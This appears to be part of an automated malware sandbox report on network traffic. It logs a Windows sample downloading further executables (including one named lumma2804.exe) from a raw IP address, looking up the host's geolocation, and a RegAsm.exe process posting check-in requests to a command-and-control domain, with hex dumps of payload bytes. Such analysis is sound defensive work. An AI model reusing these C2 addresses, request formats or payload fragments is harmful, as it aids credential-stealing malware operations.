May 6, 2024 07:53:02.233378887 CEST	1289	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 da 8d 9c 00 00 00 00 00 02 c2 aa 00 00 00 00 00 be 47 56 00 00 00 00 00 d4 12 64 00 00 00 00 00 b0 f6 9d 00 00 00 00 00 ee 66 55 00 00 00 00 00 73 00 00 80 00 00 00 00 2c 91 51 00 00 00 00 00 08 38 54 00 00 00 00 00 Data Ascii: GVdfUs,Q8TeH3NvRVQZCJt&
May 6, 2024 07:53:02.233390093 CEST	1289	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 6, 2024 07:53:02.233498096 CEST	1289	IN	Data Raw: 5b f8 e8 a3 64 47 b3 17 14 cd 12 1d 8b 29 03 b9 b2 58 0c 92 f8 e8 a3 64 1b c0 b8 d9 a4 9f 5c 79 ce ce 1e 89 69 e8 04 4b e1 eb 4a 21 d8 f8 e8 a3 64 d7 25 00 12 e1 7b 1f 2c 22 e6 e1 b9 3a 86 1c 44 a8 b0 d8 f8 e8 a3 64 a5 51 29 53 b6 b6 12 9b 04 fa Data Ascii: [dG)Xd\yiKJ!d%{,":DdQ)S"d'_!d%KWQdYEw'Od?k1*>D\|("FO6]nHGOd7iOj'Odx.v{Odb8jqG'Od\im"iL1
May 6, 2024 07:53:02.486310959 CEST	1289	IN	Data Raw: e8 69 fa 19 97 d9 22 b0 ff 9e 57 40 03 8d c8 52 1e 09 21 99 26 72 2d 3b cc 56 6a e0 5c b6 63 b4 5c a5 63 31 4c fe 6f 68 03 de d9 49 29 62 67 90 04 a4 e5 3b 5c 82 78 eb be dc 26 38 0b 35 5d c4 e7 c2 0a 8f 3d f4 da 32 60 87 cd 44 40 a2 04 fe 49 dd Data Ascii: i"W@R!&r-;Vj\c\c1LohI)bg;\x&85]=2`D@IY.Vn_i:\Tj3Q<{_TtR!KLUMT=Yn.FJneoA}VbF1b=6qvmc*;7_#3>a]m#wb!qMBL~vJ
May 6, 2024 07:53:02.486387968 CEST	1289	IN	Data Raw: 24 05 1f 0c 2d dd d0 ca 80 c2 26 ff 4c 24 01 d0 c2 68 b1 c3 87 f9 e9 b7 3f 05 00 32 d3 66 d3 e9 86 4c 24 07 86 6c 24 07 d0 ca fe c2 0a c9 0f b3 c9 f6 d2 66 ff c1 d0 ca 32 da 89 4c 24 00 59 8d 54 14 04 c1 c1 ae 66 8b 0c 22 e8 89 ea 07 00 81 ee 04 Data Ascii: $-&L$h?2fL$l$f2L$YTf"lh+d$e9Vf>L%h->.J<j[LH2"L/<G(:.0KX3e}w1JxTUd-^x
May 6, 2024 07:53:02.486401081 CEST	1289	IN	Data Raw: a8 a3 9d 47 68 a3 55 3e 79 8d 4c 0c 0c 68 15 6c 3f d1 89 01 66 f7 54 24 0c 68 10 67 83 3e 8d 64 24 14 e9 2f 71 56 00 e9 95 4f 51 00 ba 33 19 94 f2 66 0f b6 54 25 00 b9 32 91 a2 7b 8a 8c 0d d0 6e 5d 84 e8 70 7e 54 00 bd 0e 62 8b f3 8b 2c 26 68 8f Data Ascii: GhU>yLhl?fT$hg>d$/qVOQ3fT%2{n]p~Tb,&hh=Ucii2]SGjMN-wo6)}3p%k0!=^!$Y]Jn~Ed3"@^%Ez}F
May 6, 2024 07:53:02.486412048 CEST	1289	IN	Data Raw: 96 74 50 88 cc ce 1f 40 ab 5c d2 29 b2 b7 fc 2e 42 69 3c fd 10 88 78 0d 75 c1 13 1f 40 ab 5c d2 47 f5 71 8b a9 e8 ca 16 97 ad a6 2e ce 1f 40 ab 5c d2 96 22 7a 00 e5 fb 27 7b 04 bf 97 d9 95 54 c4 ce ff 13 1f 40 ab 5c d2 69 f2 76 fc a6 91 b8 a3 1e Data Ascii: tP@\).Bi<xu@\Gq.@\"z'{T@\iv7Aw(@\QkAaUa@\9np.*!~@\poMmG@\#kPP0]@\=csXX\bQ{/Y>'r}<{o\\5@\m5_
May 6, 2024 07:53:02.486423969 CEST	1289	IN	Data Raw: 94 31 95 40 ff ff ff ff f1 3a 07 15 e6 13 ff 0f cb a8 2e 56 ae 33 40 ff ff ff ff de 3c 80 0a d8 36 c8 fa 73 78 fb 95 40 ff ff ff ff f6 12 72 86 a4 55 74 b8 0b 6b 30 f5 46 94 39 72 aa 49 b6 54 8d 28 73 72 b7 7c 41 fd d3 d1 b4 a3 3a 00 ce 42 48 cf Data Ascii: 1@:.V3@<6sx@rUtk0F9rIT(sr\|A:BH{'p`kZ0y:oQqDNk><bexo>(\`\|/me#1yyKi0kMPp6C6KEv
May 6, 2024 07:53:02.486434937 CEST	1289	IN	Data Raw: 20 94 fb 4f 93 13 0b cd c0 b8 53 90 e5 03 90 92 00 f7 15 e9 4f e2 5f e4 3d c9 a4 af 50 08 31 03 90 92 00 30 96 13 96 a3 47 5a 9b eb e1 56 08 31 03 90 92 00 2f 40 37 fa c8 5e ad 23 fb 3f 65 b3 fc 6f 6d ff 99 2b af ac a7 bb cf 1a 11 54 3d f8 e4 cd Data Ascii: OSO_=P10GZV1/@7^#?eom+T=@8{C8O]lRnl_l+Fb)+(\2"gr v-XZp wu'a\x7+@%`{z\%&RfT$f
May 6, 2024 07:53:02.486552000 CEST	1289	IN	Data Raw: 1a 96 6f 0b fb 36 ce 77 02 cc f7 0c 78 2e a4 15 a8 25 3a 42 bd 11 95 0c cc 64 a8 50 e9 9c 35 cf 00 44 57 b3 1f d0 47 17 dc 10 eb 8b 85 a8 18 52 27 e6 ed 25 be b2 1f a3 4d 17 88 17 81 fc aa 07 a3 f9 4e ba 63 f8 f4 59 65 88 fc 69 d8 05 97 12 bf 1b Data Ascii: o6wx.%:BdP5DWGR'%MNcYeio\|!e(y&=tQlCS_,/\PIOci6G{hP)o0zq/Q\&i:p/U{G#4q;)hB->3&E0TVT.66:Z#)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49743	193.233.132.253	80	1804	C:\Users\user\Desktop\OJa1BOigU3.exe

Timestamp	Bytes transferred	Direction	Data
May 6, 2024 07:53:10.698947906 CEST	223	OUT	HEAD /lumma2804.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 193.233.132.253 Cache-Control: no-cache
May 6, 2024 07:53:10.969779968 CEST	155	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Length: 483440 Date: Mon, 06 May 2024 05:53:10 GMT Server: Python/3.10 aiohttp/3.8.6
May 6, 2024 07:53:10.970299959 CEST	222	OUT	GET /lumma2804.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 193.233.132.253 Cache-Control: no-cache
May 6, 2024 07:53:11.239703894 CEST	155	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Length: 483440 Date: Mon, 06 May 2024 05:53:11 GMT Server: Python/3.10 aiohttp/3.8.6
May 6, 2024 07:53:11.240375042 CEST	1289	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL7f0N `@ `
May 6, 2024 07:53:11.240386963 CEST	1289	IN	Data Raw: 00 00 02 50 06 8f 1c 00 00 01 25 71 1c 00 00 01 20 ae 00 00 00 58 d2 81 1c 00 00 01 02 50 06 8f 1c 00 00 01 25 71 1c 00 00 01 20 af 00 00 00 59 d2 81 1c 00 00 01 02 50 06 8f 1c 00 00 01 25 71 1c 00 00 01 20 e8 00 00 00 58 d2 81 1c 00 00 01 dd 03 Data Ascii: P%q XP%q YP%q XzP%q aP%q@XP%qCY ~(~( P%qX0~(~( P
May 6, 2024 07:53:11.240398884 CEST	1289	IN	Data Raw: 00 00 04 73 1a 00 00 0a 80 29 00 00 04 14 80 2a 00 00 04 14 80 2b 00 00 04 14 80 2c 00 00 04 14 80 2d 00 00 04 14 80 2e 00 00 04 14 80 2f 00 00 04 7e 18 00 00 0a 80 30 00 00 04 17 28 1b 00 00 0a dd 06 00 00 00 26 dd 00 00 00 00 2a 00 01 10 00 00 Data Ascii: s)+,-./~0(&EP*0W iZ ]Y X ]: ij\nXjXmijjZ8Xi?i%G
May 6, 2024 07:53:11.240410089 CEST	1289	IN	Data Raw: 1f 2f 06 28 20 00 00 06 12 04 11 05 11 06 09 18 1f 17 1f 30 06 28 20 00 00 06 12 03 11 04 11 05 11 06 16 1c 1f 31 06 28 21 00 00 06 12 06 09 11 04 11 05 1d 1f 0a 1f 32 06 28 21 00 00 06 12 05 11 06 09 11 04 1f 0e 1f 0f 1f 33 06 28 21 00 00 06 12 Data Ascii: /( 0( 1(!2(!3(!4(!5(!6(!7(!8(!9(!:(!;(!<(
May 6, 2024 07:53:11.240422964 CEST	1289	IN	Data Raw: 73 22 00 00 0a 26 dd 0c 00 00 00 26 17 80 0d 00 00 04 dd 16 00 00 00 00 28 23 00 00 0a 80 0d 00 00 04 dd 06 00 00 00 26 dd 00 00 00 00 2a 00 00 01 1c 00 00 00 00 00 00 0b 0b 00 0c 14 00 00 01 00 00 18 00 0f 27 00 06 14 00 00 01 76 28 23 00 00 06 Data Ascii: s"&&(#&'v(#:s"($(088+iB8io%&(YB6o&&0Z8Jo'(ZXjXo(o)o)
May 6, 2024 07:53:11.240436077 CEST	1289	IN	Data Raw: 11 16 11 0c 3f d4 ff ff ff 11 0d 6f 62 00 00 06 11 04 80 0f 00 00 04 dd 0d 00 00 00 09 39 06 00 00 00 08 28 33 00 00 0a dc 06 20 28 04 00 00 6f 34 00 00 0a 0b 16 13 19 38 fa 01 00 00 00 07 11 19 9a 13 1a 11 1a 6f 35 00 00 0a 13 1b 7e 0f 00 00 04 Data Ascii: ?ob9(3 (o48o5~o6 @_ ?_(o7o8!o9t#o:9o;(<o=oo>iX !!o?o@9!o
May 6, 2024 07:53:11.240470886 CEST	1289	IN	Data Raw: 00 70 28 55 00 00 0a 72 04 04 00 70 28 64 00 00 0a 28 37 00 00 06 d0 16 00 00 02 28 15 00 00 0a 28 65 00 00 0a 74 16 00 00 02 80 2a 00 00 04 7e 2a 00 00 04 02 03 04 6f 64 00 00 06 2a 00 13 30 06 00 50 00 00 00 00 00 00 00 7e 2b 00 00 04 3a 37 00 Data Ascii: p(Urp(d(7((et~od0P~+:7(>rp(Urp(d(7((et+~+oh*0\~,:A(>r6p(UrDp(UrVp(f(7((et,~,
May 6, 2024 07:53:11.240483046 CEST	1289	IN	Data Raw: 69 6f 70 00 00 0a 6f 71 00 00 0a 6f 6b 00 00 0a 28 75 00 00 0a 2a 00 00 00 1e 02 28 14 00 00 0a 2a 4e 02 28 14 00 00 0a 02 03 73 2d 00 00 0a 7d 33 00 00 04 2a 32 02 7b 33 00 00 04 6f 27 00 00 0a 2a 00 00 00 36 02 7b 33 00 00 04 03 6f 2f 00 00 0a Data Ascii: iopoqok(u(N(s-}32{3o'6{3o/>{3ov2{3ow2{3o00\~5:Q5~( s~(~(~(?rpsz*(
May 6, 2024 07:53:11.240495920 CEST	1289	IN	Data Raw: 67 00 00 04 11 14 16 3f 25 00 00 00 11 14 1f 32 3c 1c 00 00 00 11 15 11 14 1f 1f 5f d2 7d 65 00 00 04 11 15 11 14 1f 20 5f 16 fe 02 7d 66 00 00 04 11 15 11 13 7d 64 00 00 04 06 7b 74 00 00 04 11 15 6f 79 00 00 0a 11 13 17 58 13 13 11 13 11 0b 3f Data Ascii: g?%2<_}e _}f}d{toyX?sz}u8~9(~9(s}h}is}j~9(~9(~9(}k}l}p:"
May 6, 2024 07:53:11.240576029 CEST	1289	IN	Data Raw: 14 00 00 00 14 00 00 00 14 00 00 00 14 00 00 00 2f 00 00 00 2f 00 00 00 4b 00 00 00 4b 00 00 00 14 00 00 00 6e 00 00 00 86 00 00 00 9e 00 00 00 14 00 00 00 ad 00 00 00 38 b7 00 00 00 07 7b 7c 00 00 04 11 28 14 a2 38 a8 00 00 00 07 7b 7c 00 00 04 Data Ascii: //KKn8{\|(8{\|(){es8{\|(j){es8q{\|(#){es8N{\|(~sB86{\|(~sC8{\|(8{\|(s
May 6, 2024 07:53:13.600815058 CEST	226	OUT	HEAD /retailerTest.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 193.233.132.253 Cache-Control: no-cache
May 6, 2024 07:53:13.871531963 CEST	156	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Length: 1896048 Date: Mon, 06 May 2024 05:53:13 GMT Server: Python/3.10 aiohttp/3.8.6
May 6, 2024 07:53:13.871908903 CEST	225	OUT	GET /retailerTest.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 193.233.132.253 Cache-Control: no-cache
May 6, 2024 07:53:14.141696930 CEST	156	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Length: 1896048 Date: Mon, 06 May 2024 05:53:13 GMT Server: Python/3.10 aiohttp/3.8.6

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49739	34.117.186.192	443	1804	C:\Users\user\Desktop\OJa1BOigU3.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:52:31 UTC	237	OUT	GET /widget/demo/84.17.40.101 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: ipinfo.io
2024-05-06 05:52:32 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Mon, 06 May 2024 05:52:31 GMT content-type: application/json; charset=utf-8 Content-Length: 1023 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 2 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-06 05:52:32 UTC	741	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 75 6e 6e 2d 38 34 2d 31 37 2d 34 30 2d 31 30 31 2e 63 64 6e 37 37 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4d 69 61 6d 69 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 32 35 2e 37 37 34 33 2c 2d 38 30 2e 31 39 33 37 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 20 20 22 Data Ascii: { "input": "84.17.40.101", "data": { "ip": "84.17.40.101", "hostname": "unn-84-17-40-101.cdn77.com", "city": "Miami", "region": "Florida", "country": "US", "loc": "25.7743,-80.1937", "org": "AS60068 Datacamp Limited", "
2024-05-06 05:52:32 UTC	282	IN	Data Raw: 20 20 20 20 7d 2c 0a 20 20 20 20 22 61 62 75 73 65 22 3a 20 7b 0a 20 20 20 20 20 20 22 61 64 64 72 65 73 73 22 3a 20 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 2c 20 5a 64 65 6e 65 6b 20 43 65 6e 64 72 61 2c 20 32 30 37 20 52 65 67 65 6e 74 20 53 74 72 65 65 74 2c 20 57 31 42 20 33 48 48 2c 20 4c 6f 6e 64 6f 6e 2c 20 55 4e 49 54 45 44 20 4b 49 4e 47 44 4f 4d 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 64 61 74 61 63 61 6d 70 2e 63 6f 2e 75 6b 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 43 6f 6e 74 61 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 30 2f 32 34 22 2c 0a 20 20 Data Ascii: }, "abuse": { "address": "Datacamp Limited, Zdenek Cendra, 207 Regent Street, W1B 3HH, London, UNITED KINGDOM", "country": "US", "email": "abuse@datacamp.co.uk", "name": "Abuse Contact", "network": "84.17.40.0/24",

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	104.26.5.15	443	1804	C:\Users\user\Desktop\OJa1BOigU3.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:52:32 UTC	261	OUT	GET /demo/home.php?s=84.17.40.101 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: db-ip.com
2024-05-06 05:52:32 UTC	658	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:52:32 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: AC46FEF2:934C_93878F2E:0050_66387020_BD286D2:7B63 x-iplb-instance: 59128 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jzB2tkV3%2FZS3cYt3AwtpQu%2FI2Ue%2Bwe5Sk95thEFfxfDqv0Q9mAmrgNTIlwvWEaQUK4gBKucPDLaskN%2FFpxgPbVB6ZywIbWfE%2B2C7KMbZ3tnpg6M3m4t2FbdPaA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b46bec0ea54c-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:52:32 UTC	690	IN	Data Raw: 32 61 62 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 69 70 41 64 64 72 65 73 73 22 3a 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 69 73 45 75 4d 65 6d 62 65 72 22 3a 66 61 6c 73 65 2c 22 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 22 63 75 72 72 65 6e 63 79 4e 61 6d 65 22 3a 22 44 6f 6c 6c 61 72 22 2c 22 70 68 6f 6e 65 50 72 65 66 69 78 22 3a 22 31 22 2c 22 6c 61 6e 67 75 61 67 65 73 22 3a Data Ascii: 2ab{"status":"ok","demoInfo":{"ipAddress":"84.17.40.101","continentCode":"NA","continentName":"North America","countryCode":"US","countryName":"United States","isEuMember":false,"currencyCode":"USD","currencyName":"Dollar","phonePrefix":"1","languages":
2024-05-06 05:52:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49744	104.21.30.191	443	5064	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:14 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:14 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-05-06 05:53:14 UTC	820	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tet4ji5lpgq4qb1jcte3vndc07; expires=Thu, 29-Aug-2024 23:39:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bfQAmPUrK2k6Tt%2F6XAxqoyfkMixl%2BzKo%2FWewFQTWZgDSodow5UFlg78CVgQnFm8Akp4VbCUWlFM33tzO9k9XGUzN%2BCgsfcpk60w6xtSt6OSAZeP6Sjk7GLwo9KGe5KTZTbyq%2FvESRhchP83nwA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b570fa07a668-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:53:14 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-05-06 05:53:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49745	104.21.30.191	443	5064	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:15 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 49 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:15 UTC	49	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
2024-05-06 05:53:15 UTC	816	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3e852b8u4o1sb8qmu24lbrqas5; expires=Thu, 29-Aug-2024 23:39:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I64ja43KmWPNPV%2BdwxBgDPu8%2F1sVxqZvcemR1YAIx5qCJK6xfkbbLOKxckozSzFSa5fnh3HaDmVWErwpAJchtcUhwFZacERz0Z6MFFm1bB7X3pipPcU6TfLp9qmB%2FgvhsIRjtYZRbgr3K0EC1w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b5764d097486-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:53:15 UTC	553	IN	Data Raw: 33 64 62 34 0d 0a 48 7a 75 31 58 65 74 38 73 62 4e 78 31 76 59 47 45 35 54 4a 43 4c 53 57 75 51 4c 71 6e 4f 4b 52 55 49 71 58 45 44 43 77 6c 73 6c 6b 4d 62 78 2f 6e 56 36 4c 6b 30 58 36 2f 41 38 78 35 36 77 71 6a 72 62 4e 63 4a 2f 35 7a 70 74 5a 71 50 5a 30 45 6f 71 32 72 33 35 58 78 6a 6a 48 64 72 69 52 48 4b 37 55 50 44 50 50 77 77 48 50 6e 4c 41 4c 79 50 6d 4d 73 32 71 71 74 57 64 56 30 76 4f 78 61 31 37 62 4c 6f 49 54 33 2f 4d 63 73 34 4a 6e 66 76 57 36 59 35 72 2f 31 69 44 47 6c 75 75 59 63 75 2f 74 4d 67 71 51 74 49 52 36 54 39 51 51 69 67 2f 61 6b 56 33 63 2f 77 38 78 38 62 30 71 6a 72 61 62 58 73 6a 73 67 2b 4d 78 35 2b 52 4d 45 6f 72 74 6c 54 31 53 77 54 69 5a 48 63 58 61 48 72 69 46 57 6a 47 75 2f 7a 69 45 70 6f 6b 79 6c 37 37 6f 6d 43 32 41 6e Data Ascii: 3db4Hzu1Xet8sbNx1vYGE5TJCLSWuQLqnOKRUIqXEDCwlslkMbx/nV6Lk0X6/A8x56wqjrbNcJ/5zptZqPZ0Eoq2r35XxjjHdriRHK7UPDPPwwHPnLALyPmMs2qqtWdV0vOxa17bLoIT3/Mcs4JnfvW6Y5r/1iDGluuYcu/tMgqQtIR6T9QQig/akV3c/w8x8b0qjrabXsjsg+Mx5+RMEortlT1SwTiZHcXaHriFWjGu/ziEpokyl77omC2An
2024-05-06 05:53:15 UTC	1369	IN	Data Raw: 73 47 6a 6d 35 74 4b 78 78 47 59 39 39 79 52 6a 64 30 42 36 30 68 6d 78 36 2f 61 35 34 33 66 33 57 62 59 6a 7a 69 76 77 78 36 50 4a 34 57 4e 33 2b 72 33 42 55 30 54 2b 4a 58 70 32 35 65 4e 2f 55 59 32 6d 32 38 79 69 57 31 39 35 77 6a 2f 4b 57 73 51 69 6f 6e 52 6c 4e 6e 4a 2f 70 50 7a 47 38 4a 75 46 31 75 4a 45 55 75 4e 51 38 4d 37 61 6a 62 39 58 33 30 47 2b 4c 39 6f 76 68 4d 76 72 7a 66 31 66 41 38 71 35 7a 55 39 51 74 67 78 44 56 30 68 71 2f 6e 57 46 32 38 75 73 6b 76 70 2b 77 49 49 2f 6d 77 4b 74 77 71 4e 52 2f 57 64 37 2b 76 48 30 5a 76 31 53 57 55 4c 75 36 43 74 7a 2f 44 7a 48 78 70 79 71 4f 74 70 74 6b 69 66 71 42 39 7a 7a 6d 38 58 35 55 33 50 6d 6b 65 31 50 58 4f 49 4d 57 32 39 41 65 76 35 74 6b 64 50 75 76 62 4e 72 31 33 69 44 47 6c 75 75 59 63 75 Data Ascii: sGjm5tKxxGY99yRjd0B60hmx6/a543f3WbYjzivwx6PJ4WN3+r3BU0T+JXp25eN/UY2m28yiW195wj/KWsQionRlNnJ/pPzG8JuF1uJEUuNQ8M7ajb9X30G+L9ovhMvrzf1fA8q5zU9QtgxDV0hq/nWF28uskvp+wII/mwKtwqNR/Wd7+vH0Zv1SWULu6Ctz/DzHxpyqOtptkifqB9zzm8X5U3Pmke1PXOIMW29Aev5tkdPuvbNr13iDGluuYcu
2024-05-06 05:53:15 UTC	1369	IN	Data Raw: 33 2f 32 75 63 6b 76 64 4d 34 67 4d 31 4e 67 61 76 70 56 71 66 76 32 6e 62 38 54 2f 31 47 69 48 2f 34 33 2b 4f 65 7a 31 4d 68 79 36 6e 38 41 39 58 73 39 2f 30 56 79 54 38 42 36 37 68 6d 64 67 74 4a 35 70 32 50 72 63 64 73 69 57 36 2b 78 38 67 4a 35 72 4f 72 6d 66 36 33 70 56 6c 32 66 4c 58 74 4c 64 48 37 57 62 59 6e 76 2b 71 47 76 45 2f 64 52 6f 68 2f 65 42 38 44 62 70 2f 32 42 41 30 76 69 35 63 56 50 52 4d 49 51 53 6b 35 39 37 33 2f 38 6b 64 75 37 72 4d 70 53 30 38 57 4f 63 2f 59 71 78 42 2b 76 37 66 46 58 45 74 4d 4d 57 52 70 6c 58 34 67 65 37 75 6e 6a 30 6b 32 67 78 72 75 6b 71 32 2f 58 54 5a 70 72 78 6a 66 41 38 35 76 70 33 58 64 72 30 71 33 42 63 30 7a 53 43 48 64 37 56 41 62 36 55 62 48 54 33 6f 57 43 57 75 72 4d 4c 34 37 36 48 36 33 4b 77 74 7a 4a Data Ascii: 